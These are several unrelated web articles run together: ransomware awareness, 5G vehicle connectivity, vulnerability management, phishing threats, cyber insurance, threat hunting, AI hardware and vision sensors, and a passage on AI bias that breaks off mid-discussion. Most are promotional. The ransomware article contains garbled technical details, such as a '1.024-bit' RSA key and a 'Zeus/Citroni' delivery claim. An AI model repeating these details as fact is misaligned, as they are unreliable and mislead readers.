Ransomware is essentially a digital mechanism used for extortion. Most commonly, ransomware attacks encrypt the victim’s data and then demand a ransom for the return of the information. Data is an incredibly valuable asset, many people are willing to pay for its return.
Unfortunately, paying the ransom is the worst decision you can make as a ransomware victim. Paying the ransom does not guarantee you will get your information returned, or will be returned decrypted. Modern crypto malware uses encryption schemes that seem to be unbreakable, so paying up may feel like it’s your only option to get your data back.
We will discuss every aspect of ransomware, from how it happens, how not to be vulnerable, and the best course of action if you do fall victim.
As cybercriminals become increasingly aware that ransomware victims are willing to pay to get their information back, the prevalence of ransomware and its variations will continue to rise.
A common ransomware scenario is as follows. The victim receives and email from what appears to be a friend or other trusted source, and the email contains an executable link. The file is opened unknowingly because it appears to the recipient as innocent, and immediately this triggers the download of crypto malware. The victims files are then encrypted and held hostage for a ransom in order to get the decryption key.
A different, more sophisticated crypto malware mechanism is delivered a Trojan of the Zeus/Citroni virus, which is easily purchased by attacks for only a few thousand dollars. This sum is not significant when considering the hundreds of thousands of dollars it can earn the cybercriminal. Attackers are able to drop the Citroni into a user’s computer using the Angler exploit kit. This particular ransomware contains a number of unique features, and according to researchers is the first ransomware that used the Tor network to command and control.
Regardless of the delivery, victims are often made aware of the attack via the appearance of a dialogue box, informing them of the infection, and demanding a ransom amount. Users are often told that they have 72 hours to pay the ransom or the decryption key will be destroyed and their information will be lost forever.
The Big-Business Of Ransomware
A large number of victims simply pay the ransom and chalk it up to the cost of doing business in the digital age. And because of this, ransomware is big-business for cybercriminals.One of the most famous ransomware variations called “CryptoLocker”, has infected tens of thousands of machines, generating millions in revenue for the attackers behind it.
The numbers don’t lie, and the threat of crypto malware is increasing, with attack reports in the millions, and growing by leaps and bounds every year. As long as people are willing to pay the ransom, the threat will continue. Statistics show that up to 40% of victims pay the ransom, helping attackers rake in an estimated $30 million a quarter.
Because of the inability to decipher files that have been encrypted by modern spyware spawns, there is an additional threat, that of a false remedy. Users who are desperate to resolve tier issue without paying the ransom search the internet for help and stumble across software that claims to fix the encrypted data. In reality, there is no fix, and the software is either a useless waste of money or worse, distributes additional malware.
The Evolution Of Ransomware
Cybercriminals become more sophisticated in their methods with every passing year. In the beginning, the first crypto malware used a symmetric-key algorithm, using the same key for encryption as for decryption. This made it easier, with the help of anti-malware vendors, for the encrypted information to be decrypted.
It didn’t take long for attackers to step up their game, and they began using public-key cryptography algorithms that use two separate keys. Public key for encryption, and a private key for decryption. One of the first public-key crypto systems to be used by cybercriminals was called RSA, and experts were able to crack a 660-bit RSA code, but soon after the authors switched to a 1.024-bit key, making it practically impossible to decrypt.
It is not possible to decrypt files that have been encrypted by modern crypto malware. This means the only measure of defense one has is it to keep data safe by backing up files. Unfortunately, a regular backup is not enough, as it leaves files that have been recently changed unprotected.
Many ransomware variants are intelligent enough to look for backups and encrypt those as well, including those residing on network shares. In response to this, Kaspersky has developed an alternative method of defense, based on the System Watcher module.
Don’t leave yourself vulnerable to malware attack. Contact Hammett Technologies to discuss how to stay ahead of cybercriminals and ensure you are never left without your important information or resources. Call us at (443) 216-9999 or send an email to email@example.com. | <urn:uuid:f5fe81e2-4221-406d-a2c6-735cb158eaba> | CC-MAIN-2022-40 | https://www.hammett-tech.com/promoting-employee-awareness-of-ransomware/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336921.76/warc/CC-MAIN-20221001195125-20221001225125-00115.warc.gz | en | 0.939189 | 1,036 | 2.734375 | 3 |
Cellular Vehicle-to-Everything (C-V2X)
The automotive sector is on the brink of a digital revolution with the commencement of 5G, bringing new opportunities for cellular vehicle-to-everything (C-V2X) technology. Next-gen capabilities such as ultra-reliable low-latency communication (URLLC) and high bandwidth are set to transform connected cars and, ultimately, the way we travel.
Existing cellular technology addresses some V2X requirements, so what makes 5G so different? Combined with fast-developing AI and sensor technologies, 5G will enable completely autonomous vehicles. This means the possibility of eliminating or minimizing road accidents by enabling vehicles to share data in real-time and avoid accidents. In addition, 5G-powered self-driving cars will also vastly improve vehicular performance through energy optimization, ensure traffic efficiency, provide faster routes through accurate route mapping, enable safer roads by letting drivers “see” beyond their visual horizon, and much more. V2X will not only help vehicles communicate with each other and prevent accidents and hazards, but it will also help protect pedestrians with the PC5 interface integrated into their smartphones.
The result: significantly improved quality of life and tremendous monetary savings.
V2X capabilities and transmission modes
The connected cars of today have been evolving for years to become increasingly connected, intelligent, autonomous, and efficient. Apart from reducing latency and enhancing safety, cellular V2X also brings new capabilities to the table.
As a part of 3GPP release 14, V2X includes two transmission modes that collectively enable several use cases:
Direct C-V2X (Cellular V2X) – operates in its own 5.9 GHz spectrum that is independent of mobile networks. It includes the following use cases:
- Cars connecting to each other – Vehicle to Vehicle (V2V)
- Cars connecting to pedestrians – Vehicle to Pedestrians (V2P)
- Cars connecting to infrastructure like street signals – Vehicle to Infrastructure (V2I)
Vehicle to Network (V2N) – relies on traditional licensed mobile spectrum
In Release 16, too, direct C-V2X can operate without dependence on cellular networks. However, 5G connectivity helps build an ecosystem of highly reliable and accurate devices that enable autonomous vehicles. These include sensors, cameras, light detection devices, real-time car-to-car communications, and more. With 5G’s ability to support a large number of connected devices in a small geographical area, vehicles will be able to access more data about their surroundings.
C-V2X use cases enabled by 5G
The V2X ecosystem enables a broad range of services for connected car environments, and 5G takes accuracy to new heights. Some high-value use cases include:
Why it demands an edge core
Today, autonomous cars like Tesla and Zoox are highly advanced and require mission-critical low-latency. 5G URLLC enables them to fully meet their potential. The 5G edge core is essential in enabling mobile network operators to cater to 5G connected cars by helping keep latency low, maintaining safety even for vehicles driving at high speeds.
How does 5G core enable V2X?
An edge core with high transaction per second (TPS) is imperative for C-V2X. Alepo’s 5G Converged Core provides V2X support, including V2X subscriptions and policies, the capability to configure and maintain V2X subscription parameters, and more. It allows UEs to be authorized for V2X capability in both EPC and 5GC. UEs can be classified into two types – vehicle and pedestrian – each having its own QoS parameters.
Alepo’s Policy Control Function (PCF) will help configure policies for vehicle and pedestrian UEs. The operator can launch innovative V2X services by defining parameters such as RAT, transmission profile, communication mode, and signaling protection mode. Individual services can then be associated with a V2X policy, customizable for different geographical areas and radio parameters.
With Alepo’s Subscriber Data Management (SDM) agent portal, each individual subscriber profile can be enabled for V2X services. This flexible configuration will enable the operator to achieve optimized end-to-end V2X connectivity.
Where we’re headed
Cellular vehicle-to-everything provides a host of benefits for all involved parties: vehicle manufacturers, drivers, pedestrians, those in charge of traffic operations and management, and, of course, 5G network providers. 5G enables the end-to-end delivery of V2X services, ensuring high ROI.
C-V2X can be rapidly deployed as it is compatible with LTE base stations. 3GPP standards help provide a roadmap for operators to evolve from LTE to 5G, ensuring a highly scalable and future-proof investment. Operators can leverage their existing network infrastructure for the initial rollout of services, and gradually transition as they evolve their networks.
It will be a while before the autonomous car ecosystem is fully functional. However, the technology is ready and communications service providers should invest in the necessary infrastructure now. Trials should be conducted to ensure the reliability and feasibility of the ecosystem.
Alepo already has 5G trials underway, and we’d love to share the details with you. To know more, write to us on firstname.lastname@example.org. | <urn:uuid:6f392112-d9da-452e-86dc-413516ff6791> | CC-MAIN-2022-40 | https://www.alepo.com/5g-core-enabled-cellular-vehicle-to-everything-c-v2x-services/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337504.21/warc/CC-MAIN-20221004121345-20221004151345-00115.warc.gz | en | 0.919236 | 1,145 | 2.640625 | 3 |
Vulnerability Management - What every CISO needs to know
Understanding what your organisation’s vulnerabilities are is a topic that every CISO needs to know, and what every board member would rather not want to learn about as it covers off so many things such as assessing your host, network, and application vulnerabilities and strategies to remediate them. Every year, thousands of new vulnerabilities are discovered meaning that organisations are trying to patch operating systems (OS) and applications and reconfigure security settings throughout the entirety of their network environment.
In this article we are going to understand in more detail what vulnerability management is, what is vulnerability, how to manage the process, how to make it a board priority and finally, how to find solutions to vulnerability management.
What is Vulnerability Management?
Firstly we must understand what vulnerability management is. As Wikipedia best describes the process as, ‘vulnerability management is the "cyclical practice of identifying, classifying, prioritising, remediating, and mitigating" software vulnerabilities. Vulnerability management is integral to computer security and network security, and must not be confused with vulnerability assessment.’
The most important aspect about vulnerability management is that it is an ongoing process, one used to continuously identify vulnerabilities that can be remediated through patching and configuration of security settings.
This kind of analysis can help organisations stay ahead of the common issues found in cybersecurity and make the necessary changes to ensure that they are protected for present and future requirements.
What is Vulnerability?
Vulnerability is the potential weaknesses that can be exploited by criminals. These can be things such as;
- Malware susceptibility - These include computer viruses, computer worms, Ransomware, Keyloggers, Trojan horses, spyware.
- Insecure system configurations - This is where a configuration is just plain wrong, either from the start or after changes were made that compromise the security of the application or system. This faulty configuration can then end up getting used everywhere in the company.
- Proxy attacks - This is where an attacker will install a proxy through which the user's network traffic will be passed. The attacker can gather confidential information from the traffic while retransmitting it back and forth between the victim and a remote website.
- Botnet attacks - Botnets are networks of hijacked computer devices used to carry out various scams and cyberattacks. The term “botnet” is formed from the word's “robot” and “network.” Assembly of a botnet is usually the infiltration stage of a multi-layer scheme.
Vulnerability Management Process
The vulnerability management process is a way to define a process so that organisations can identify and address vulnerabilities quickly and continually.
There are 4 stages to the vulnerability management process which include:
- First: Determine how critical assets are
- Second: Carry out discovery to create an inventory of assets.
- Third: Identify vulnerabilities
- Fourth: Remediate and report.
Once you have identified the 4 stages, the next element to focus on is the processes which make up vulnerability management - 6 in total - each with their own subprocesses and tasks.
- Discover: there is no way to secure what you’re unaware of. Firstly, you must take an inventory of all assets across the environment, identifying details including operating system, services, applications, and configurations to identify vulnerabilities. This can include both a network scan and an authenticated agent-based system scan. Discovery should be performed regularly on an automated schedule.
- Prioritise: You must then categorise into groups the discovered assets and assign a risk-based prioritisation based on criticality to the organisation.
- Assess: You must establish the risk baseline for your point of reference as vulnerabilities are remediated and risk is eliminated. Assessments provide an ongoing baseline over time.
- Remediate: Based on risk priorities, vulnerabilities should be fixed (whether via something like patching or reconfiguration). Controls should be in place so that any remediation is completed successfully and progress can be documented.
- Verify: Fifth, validation of remediation is accomplished through additional scans and/or IT reporting.
- Report: Finally, IT, executives, and the C-suite all have a need to understand the current state of risk around vulnerabilities. This will help onboard senior staff to the importance of the risks posed to the organisation as well as clearly document where potential attacks can occur.
Making Vulnerability Management a Board Priority
In order to engage senior management and the board with the progress that is being made in vulnerability management, you need to find a way to communicate not only what is being done but the opportunities as well as threats that the organisation faces by doing so. Of course as previously noted, the process contributes toward raising the board’s awareness of the need for effective vulnerability management.
- There is a clear benefit in having assessed the criticality of various assets and applications but this must be communicated to everyone.
- Determine the risk status to the organisation - related to key assets. Think of what can be the ultimate risk to the organisation and why it matters - time and money are great examples.
- Report metrics to the board - and do this frequently and simply:
- Provide a clear, understandable assessment of the current status
- Highlight what needs to change
- Describe how this will be accomplished and what’s needed.
- It can be beneficial to alert the board to what can happen if vulnerability isn’t managed effectively. Again, you must present this as something which relates to the organisation in a way that they can understand; this has cost us x amount of operating hours or it means that a new I.T system to manage new threats will cost you money.
How to Stay on Top of Vulnerabilities
One of the biggest challenges that CISOs face is communicating just how hard it is to stay up to date with developments in modern cybersecurity and privacy along with ever evolving vulnerabilities.
Cybercriminals are becoming smarter and using technologies which can have some major organisations struggling to keep up pace with. The average organisation will be exposed to thousands of vulnerabilities every year. Knowing which are the ones that can cause widespread damage to your organisation is essential - and getting prepared for it is even more important.
There are two sources that security practitioners and developers commonly consult
- the Common Vulnerability Enumeration (CVE) program, run by Mitre
- the National Institute of Standards and Technology's National Vulnerability Database (NVD).
However, there are many unreported vulnerabilities not included in these databases. So it is even more important that future strategies adopt a risk mitigation strategy for unreported vulnerabilities. For example;
- Asset management -
- Knowing the software titles / versions currently on the network
Vulnerability Management Solutions
There are two principle methods for vulnerability management solutions. These are manual vs modern vulnerability management.
A modern vulnerability management solution is a consistent, systematic approach to ongoing, discovered risk within the enterprise environment. It's a data-driven approach that helps companies align their security goals with the actions they can take. A manual vulnerability management solution is however based on something called, ‘Penetration testing’, which is a manual process relying on the knowledge and experience of a penetration tester to identify vulnerabilities within an organisation's systems.
Modern vulnerability solutions simplify and automate the process of vulnerability management. Some of these deal with specific elements in the process (such as scanning only) others provide a comprehensive toolkit. Others go beyond vulnerability management to provide additional cyber security functionality.
Keep Your Vulnerability Management Up to Date
Understanding what your organisation’s vulnerabilities are is a topic that every CISO needs to know. Vulnerability management is the "cyclical practice of identifying, classifying, prioritising, remediating, and mitigating" software vulnerabilities. By understanding how to prioritise the issues and bringing your organisation’s board for greater buy-in, vulnerability management is a process that can protect the present and future success of an organisation. | <urn:uuid:7101f1a8-08e9-433b-ba06-da798df68d6f> | CC-MAIN-2022-40 | https://www.bluefort.com/news/latest-blogs/vulnerability-management-what-every-ciso-needs-to-know/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337504.21/warc/CC-MAIN-20221004121345-20221004151345-00115.warc.gz | en | 0.933956 | 1,648 | 2.5625 | 3 |
The Anti-Phishing Working Group (APWG) is an organization established in 2003 to monitor phishing threats, share data to better protect consumers and businesses, and unify the global response to cybercriminal activity. In the organization´s most recent Phishing Activity Report (July 2018), the APWG identified a 46% increase in phishing websites over the previous quarter.
During the three months phishing activity on which the report was based, the organization detected 263,538 new phishing websites – half of which had .com suffixes, and a third of which had SSL certificates to give the impression they were secure sites. Phishing threats to data were highest in the payments processing industry, with other highly-targeted industries including:
- Payments Processing 39.4%
- SaaS / Webmail 18.7%
- Financial Institutions 14.2%
- Cloud Storage / File Hosting 11.3%
- Other 16.4%
Definition of a Phishing Threat
The definition of a phishing threat is any attempt to fraudulently solicit personal information from an individual or organization, or any attempt to deliver malicious software (malware), by posing as a trustworthy organization or entity. Threats are most commonly delivered by email, as in the online banking example given below, but they can also manifest as advertisements on genuine websites that have had security vulnerabilities exploited.
A Few Types of Phishing Emails:
- Urgent or Billing Phishing: A phishing email attack that attempts to mimic a real business in order to trick victims into visiting a malware-infected site. Fictitious power bills or urgent, credit card fraud notices are common templates for a deceptive phishing email.
- Spear-Phishing: Attacks are generally more dangerous than regular phishing because spear-phishing emails are tailored to attack a specific individual, department or company.
- Whale Phishing: The main goal is to gain the credentials of top-level executives. While similar to spear-phishing, whale phishing or executive phishing is much more personalized to the target and damaging to the company.
The definition of a phishing threat given above differs slightly from the definition provided by the United States Computer Emergency Readiness Team (US-CERT). That organization´s definition of a phishing threat implies that phishing attacks online are always the result of social engineering. This is not necessarily the case, as some attacks – such as “watering hole” attacks – have become so sophisticated that social engineering is not always necessary for cybercriminals to extract sensitive data or install malware.
Phishing Threats to Your Business
Phishing Threats to Operations
Regardless of whether an employee is doing their online banking or research for a work project, if they access a fake phishing website from their work computer, and download executable malware, the organization´s entire network could be infected. Depending on the nature of the malware, data could be compromised, stolen or encrypted into a format that makes it unusable until a ransom is paid.
Phishing Threats to Data
Phishing threats to data apply whether an employee is responding to a phishing email about their bank account or to any account that requires a login and password – not just e-commerce websites, but also personal email and social media accounts. The consequences of a successful phishing attack on an organization may take years to become apparent, which is why phishing threats to data should be taken seriously and measures implemented to manage the threats.
Spear Phishing Threats
Spear phishing threats are often more successful than random phishing threats due to the victim(s) being specifically targeted by the cybercriminal. The attacker finds personal details of their victim (such as appear on social media profiles) and creates a convincing phishing email that appears realistic because of its content. The massive data breaches at Target, Anthem and Sony Pictures have all been attributed to successful spear phishing attacks.
The delivery of ransomware via email is one of the most serious of all current phishing threats. Ransomware is the easiest form of malware to monetize and there has been a noticeable increase in ransomware attacks on mobile devices (up 1,300% in 2017) and on cloud-based applications which get shared with internal and external users (44% of cloud malware types make up the most common delivery vehicles for ransomware).
See the Latest
Trends in Phishing Security
Get ahead of trending threats
with our insights and solutions
into phishing threats & attacks..
How to Prevent Phishing Threats in an Organization
With there being so many different and sophisticated types of phishing attacks online, managing phishing threats in an organization is a colossal task. Technology can help manage threats to a degree, but enough phishing emails avoid detection to make the activity of phishing still worthwhile for cybercriminals.
Simulations of Phishing Threats Makes Perfect
How can you affect lasting changes in user behavior around phishing threats? Rather than rote training, engaging users by simulating real-life phishing threats drives the point home. Just as fighter pilots train in flight simulators, users can learn by experiencing a simulated phishing threat in a controlled environment.
Mixing an occasional simulated phishing threat into users’ regular email teaches them to stay alert and spot suspicious emails. Whether they click on the simulated phish, or spot and report it to incident responders, the experience is much more likely to leave a mark compared to sitting through a lecture about security.
Users experience phishing threats in terms of how they look and act – how a malicious payload infiltrates a system, spreads across the network, disrupts operations, and steals data. Next time, they will be more attuned to a suspicious email – See Something, Say Something
Recognition is the first step in the battle against phishing threats. Conditioning users to identify phishing emails will reduce the chances they will fall for a real phishing threat. However, the chances are, if one employee is receiving phishing threats through emails, others are as well. Organizations must encourage users to report suspicious messages, including emails, texts or phone calls, to security or incident response teams.
Users who recognize potential phishing threats provide a valuable source of internal, real-time attack and threat intelligence. When they report suspicious emails, incident responders obtain information that they would not have otherwise received or received too late. This internal ‘crowdsourcing’ is especially beneficial with phishing, as it’s the most common attack method.
Overloading the Security Operations Center
A natural complication of internal reporting is to overwhelm security teams with potentially harmful emails and false positives. Being able to quickly identify which reports are more reliable than others is critical to lessening the chance of a breach from a phishing email and a factor when implementing a solution to mitigate phishing threats.
Employee-sourced reports on attacks in progress provide incident response teams and security operations analysts with the information needed to rapidly respond to potential phishing threats and mitigate the risk from those that may fall prey to them. Being able to sort, assess and respond quickly is critical to stopping a phishing breach and mitigating business disruption.
Ultimately, an end-to-end phishing threat mitigation approach is a critical foundation for any security program’s phishing threat management strategy. Instead of just being the target, the workforce becomes cybercrime sensors – sounding the alarm and keeping the organization safe by providing the information SOCs need for managing phishing threats quickly and effectively.
End-to-End Phishing Mitigation from Cofense
Cofense is a testament to this working process. Cofense has conditioned our own workforce to recognize and report phishing attempts – gathering phishing attack intelligence from our entire employee base. By analyzing these emails, Cofense has avoided compromise as well as discovering and publishing malware samples well before other leading threat intelligence providers.
Even with record investment in cybersecurity, the number of breaches attributed to phishing attacks continues to grow. It’s obvious that technology alone can’t solve the problem. That’s why Cofense solutions focus on engaging the human – your last line of defense after a phish bypasses other technology – for better prevention and response. | <urn:uuid:37d577a9-d67d-45e2-8758-4d80cd07d633> | CC-MAIN-2022-40 | https://cofense.com/knowledge-center/phishing-threats/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337668.62/warc/CC-MAIN-20221005203530-20221005233530-00115.warc.gz | en | 0.938056 | 1,699 | 3 | 3 |
Starting from a single cell and shaped by nearly 4 billion years of evolution, the human brain is perhaps nature’s greatest achievement. Our brain is an incredibly complex computing device with approximately 100 billion neurons and more than 100 trillion parameters in a biological-neural-network system that delivers a level of compute yet to be matched by any silicon computers. Today, we are revealing that Graphcore is developing an ultra-intelligence AI computer that will surpass the parametric capacity of the brain.
The computer science pioneer Jack Good* was the first person to describe a machine that would exceed the capability of our brain in his 1965 paper, Speculations Concerning the First Ultra-Intelligent Machine.
Named in honour of Jack Good, Graphcore will deliver by 2024 the world’s first ultra-intelligence AI computer that we are calling the Good™ computer.
Following on from our announcement of the Bow IPU products, we are already developing the next generation of IPU technology that will power this Good™ machine to deliver the following capabilities:
Over 10 Exa-Flops of AI floating point compute
Up to 4 Petabytes of memory with a bandwidth of over 10 Petabytes/second
Support for AI model sizes of 500 trillion parameters
3D wafer on wafer logic stack
Fully supported by our Poplar® SDK
Expected cost: ~$120 million (configuration dependent)
We will provide further updates on the Good™ computer over the coming quarters and we are keen to engage with companies and AI innovators who can help us develop the next breakthroughs in AI that this ultra-intelligence machine will make possible.
*Jack Good (born Isadore Jacob Gudak on 9 December 1916) was a true pioneer who undertook important code breaking work at Bletchley Park in the UK during the 1940s, including work on the world’s first electronic computer, Colossus.
Together with Max Newman at Manchester University he helped to build the world’s first stored-program computer, the Manchester-1. Then in 1958 he developed the concept of Fast Fourier Transforms (FFTs) which are now at the centre of all wireline and wireless communication systems.
While a Fellow at Trinity College, Oxford, in the 1960s he set out the case for complex neural networks as the way to build intelligent machines, a technology that we are starting to exploit today. He also predicted the need for ultra-parallel machines with highly parallel sparse connections.
Jack Good’s comments on reinforcement learning as the best way to train an intelligent machine are highly prescient but he also described the concept of small changes in the intelligence structure, driven by feedback from the outputs, which is effectively what we do today with back propagation in deep neural networks.
Stanley Kubrick turned to Jack Good as the advisor on the 1968 film 2001: A Space Odyssey. It was Jack Good, with his insights on intelligent machines, that helped to describe the HAL 9000 computer which was a central character in the movie. | <urn:uuid:24aa6543-b161-407f-a935-1cfa8b795f1e> | CC-MAIN-2022-40 | https://www.graphcore.ai/posts/graphcore-announces-roadmap-to-ultra-intelligence-ai-supercomputer | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00315.warc.gz | en | 0.944156 | 617 | 2.703125 | 3 |
It's easy to fool ourselves into believing that we would never be the victim of a cyber attack. We read about cyber attacks happening to large corporations. We hear about it in the breakroom at work. And while we give a sympathetic look to the employee whose credit card number was stolen, we falsely believe that such a thing would never happen to us. But it can, and it does.
Our cyber security is threatened every day. Your private information and that of your client's could be held for ransom. If you don't comply to the hacker's demands, the information will either be irretrievable, made public or erased and gone forever.
Cyber liability insurance will protect you, your clients and your business from vicious cyber attacks.
Who is the Most Vulnerable?
We're all vulnerable when it comes to a cyber attack. In fact, we have begun to learn that small businesses are just as (if not more) exposed to experiencing a cyber attack than companies like Target or American Express. The cyber security of small businesses is easier to penetrate because they are lacking in exactly that: security. Only 33 percent of small businesses in the United States have cyber liability insurance. Compare that percentage to the number of small businesses getting hacked (60 percent), and you'll wonder why more small businesses aren't investing in this coverage.
Gotta Use Protection
Inc. reports that cybercriminals go after companies with less than 100 employees. Cybercriminals believe that the smaller the company is, the easier said company is to infiltrate. This belief is in part very true: smaller companies don't generally invest in hefty cyber insurance packages because they believe they won't be targets of a security breach. As the numbers show, this isn't an accurate reflection.
According to Forbes, in 2015 the top five industries most targeted by cybercriminals were as follows:
If your small business functions in any of the above capacities, you're a target. Hackers have at their disposal a number of nasty software viruses that can infiltrate your data system and leave it in ruins. This is referred to as Malware. Malware is a term used to describe malicious software. Malicious software is a computer virus that interrupts computer systems and causes them to malfunction and shut down, it can steal sensitive information and infiltrate private servers. Malware is the cyber criminal's best friend.
The most commonly used Malware programs are:
Malware: This type of malicious software deactivates computers and computer systems.
Adware: This type of malicious software automatically downloads advertisements when a user connects to the internet.
Spyware: This type of malicious software allows the hacker to gather furtive information about another person's computer searches by transferring data from the victim's hard drive to the hacker's.
Ransomware: This type of malicious software disables a computer system until a lump sum is paid by the small business to the cybercriminal.
Phishing: While not a type of software, phishing is a common practice which attempts to defraud customers and/or clients of their financial information by posturing as an authentic company.
Trojan Horse: Named for the Greek myth, this type of malicious software is a downloadable program that promises to get rid of harmful cyber viruses. In reality, the Trojan Horse virus infects the computer and computer system with a multitude of viruses.
There are a lot of dangers out there when it comes starting a small business. Don't let cyber (in)security be one of them. Visit CyberPolicy.com today to find out more about cyber insurance. | <urn:uuid:b71b2843-b3bb-4259-92ad-955f7bd7cfd7> | CC-MAIN-2022-40 | https://www.cyberpolicy.com/cybersecurity-education/what-does-cyber-liability-insurance-protect-you-from | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335326.48/warc/CC-MAIN-20220929065206-20220929095206-00315.warc.gz | en | 0.948255 | 727 | 2.71875 | 3 |
Threat hunting is the process implemented for proactive detection of malicious activity in computer networks.
The purpose of threat hunting is to detect cyberattacks that evade traditional defenses, such as firewalls or antivirus monitoring systems. It involves a manual or computer-aided search for and analysis of indicators of compromise (IoCs).
Threat hunting should be seen as an addition to existing protection systems, rather than a replacement for them, allowing for early detection of new and sophisticated threats in the network. It is the proactive nature that distinguishes threat hunting from traditional protection methods.
How threat hunting works
System penetration can occur at any time, so threat hunting is an ongoing process. It consists of the following steps:
- Hypothesis formulation. At this stage, infosec experts suggest areas to search for threats. The source of data for such suggestions can be both internal (company information about the state of IT infrastructure, penetration test results, and the like) and external (MITRE ATT&CK matrices, cyberthreat intelligence reports, security news, and so on). For example, if a new report highlights a previously unknown piece of malware, it can be hypothesized that this malware has infiltrated the company’s infrastructure.
- Hypothesis testing. Once the hypothesis is formulated, it is tested. For example, data from endpoints is analyzed for IoCs associated with new malware.
If the hypothesis is confirmed, the company can take the necessary incident response measures. In addition, the information obtained during the threat-hunting process can be used to formulate new hypotheses and improve protection systems, for example, by updating traffic filtering rules.
Hunting Maturity Model
The Hunting Maturity Model (HMM) is a system used to assess a company’s readiness for a proactive threat search. The “maturity” level depends on what tools and methods are available to and used by the business; there are five in total:
- Initial (HMM0) — the company relies primarily on traditional security systems. At the same time, minimal information is collected from key elements of the IT infrastructure.
- Minimal (HMM1) — analysts regularly collect information from the IT infrastructure and make use of cyberintelligence data.
- Procedural (HMM2) — the company uses standard threat-hunting scenarios. At this level, infosec experts collect and analyze a large amount of data but do not develop their own threat-hunting procedures.
- Innovative (HMM3) — infosec experts collect and analyze a large amount of data, develop and implement their own threat-hunting methods, and use them on a regular basis.
- Leading (HMM4) — infosec experts not only develop threat-hunting and analysis methods, but automate them as well. This helps to reveal more threats and lets analysts focus on improving the detection system and the company’s overall protection. | <urn:uuid:cf145465-0860-4ab2-8158-38f5afa6ee34> | CC-MAIN-2022-40 | https://encyclopedia.kaspersky.com/glossary/threat-hunting/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335491.4/warc/CC-MAIN-20220930145518-20220930175518-00315.warc.gz | en | 0.907899 | 603 | 2.71875 | 3 |
Researchers at Georgia State University (GSU) have designed an ‘electric eye’ – an artificial vision device – for micro-sized robots.
Through using synthetic methods, the device mimics the biochemical processes that allow for vision in the natural world.
It improves on previous research in terms of colour recognition, a particularly challenging area due to the difficulty of downscaling colour sensing devices. Conventional colour sensors typically consume a large amount of physical space and offer less accurate colour detection.
This was achieved through a unique vertical stacking architecture that offers a novel approach to how the device is designed. Its van der Waals semi-conductor powers the sensors with precise colour recognition capabilities whilst simplifying the lens system for downscaling.
“The new functionality achieved in our image sensor architecture all depends on the rapid progress of van der Waals semiconductors during recent years,” said one of the researchers.
“Compared with conventional semiconductors, such as silicon, we can precisely control the van der Waals material band structure, thickness, and other critical parameters to sense the red, green, and blue colours.”
ACS Nano, a scientific journal on nanotechnology, published the research. The article itself focused on illustrating the fundamental principles and feasibility behind artificial vision in the new micro-sized image sensor.
Sidong Lei, assistant professor of Physics at GSU and the research lead, said: “More than 80% of information is captured by vision in research, industry, medication, and our daily life. The ultimate purpose of our research is to develop a micro-scale camera for microrobots that can enter narrow spaces that are intangible by current means, and open up new horizons in medical diagnosis, environmental study, manufacturing, archaeology, and more.”
The technology is currently patent pending with Georgia State’s Office of Technology Transfer and Commercialisation.
Want to learn more about AI and big data from industry leaders? Check out AI & Big Data Expo taking place in Amsterdam, California, and London.
Explore other upcoming enterprise technology events and webinars powered by TechForge here. | <urn:uuid:c73f19ab-5004-418a-917c-565425068b81> | CC-MAIN-2022-40 | https://www.artificialintelligence-news.com/2022/04/21/georgia-state-researchers-design-artificial-vision-device-for-microrobots/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334528.24/warc/CC-MAIN-20220925101046-20220925131046-00515.warc.gz | en | 0.907551 | 439 | 3.15625 | 3 |
agsandrew - Fotolia
Researchers at IBM’s R&D labs in Zurich have begun applying artificial intelligence (AI) and machine learning (ML) technologies to a host of new and unusual contexts as they attempt to discover what the technology is capable of.
The various projects are at different stages of fruition, but are all part of IBM’s wider strategy of developing core AI and using it to transform industries. However, as AI and ML technologies proliferate, increasing focus should be given to the ethical implications of using it, something IBM is keen to highlight.
“One of the concerns [with AI] is around bias – the fact that, especially in AI systems that are data-driven based on ML approaches, you can inject some bias,” says Francesca Rossi, global leader of AI ethics at IBM Research.
“If the training data is not inclusive enough, not diverse enough, then the AI system will not be fair in its decisions or recommendations for humans. You want to avoid that, so there is an issue around detecting and mitigating bias in training data, but also in models,” she says.
There are a variety of different kinds of biases. One is interaction bias, exemplified by Microsoft’s infamous chatbot Tay, which learned by observing how people interacted on Twitter. However, Twitter is not necessarily the best representation of real human interaction, meaning the bot had to be shut down within 24 hours due to the fact it began making racist statements.
Another, much more subtle kind of bias comes in the form of product recommendation, like the kind you see on Netflix or YouTube that recommends content you may be interested in based on what you have previously viewed. In these contexts the bias can be fairly innocuous, but when it comes to news or social media these AI filter bubbles become much more damaging through their creation of echo chambers.
Natural language bias, however, is the hardest type of bias to eliminate in AI.
Read more about artificial intelligence and deep learning
- As AI and deep learning matures, we look at advanced tools that enable developers to start building sophisticated, intelligent applications.
- Machine learning-enhanced tools are necessary to keep up with current threats, but are not perfect and will not solve the security skills gap problem, says KuppingerCole.
- Most artificial intelligence “black boxes” do not comply with EU data protection laws and will have to be re-engineered, warns security researcher and consultant.
“Certain types of bias are baked into language,” says Barry O’Sullivan, president of the European Artificial Intelligence Association. “If you look at the proximity of certain noun phrases to other noun phrases, in many languages you’ll find nouns that refer to authority positions, like president or leader or director, are very close in text with gender nouns, and that’s not the case for females who tend to be associated maybe with caring roles or supporting roles.”
According to Rossi, the intersectionality of bias means it may not be possible to completely eliminate bias. “You don’t want to be biased on various protected variables, like race and gender and age, but then by removing maybe one thing you might introduce a little more bias on another because they intersect with one another,” she says.
O’Sullivan adds that bias is ultimately a question of consensus. “We have to think very carefully about how we want to deal with bias because there are questions that we often can’t agree on, such as whether something has a bias or not. In general, the question of ethics and ethical codes ultimately comes down to whether or not there’s a consensus as to what is acceptable, and what is not,” he says.
But where does this consensus come from?
The trolley problem
The trolley problem is a theoretical question applied to self-driving cars. What it essentially boils down to is, if a crash is unavoidable and someone is going to die as a result, how does the car make that decision?
“Does it kill the young woman, or does it kill the two professional men, or does it sacrifice the two children in favour of the person who’s got world-leading expertise in neurosurgery?” says O’Sullivan.
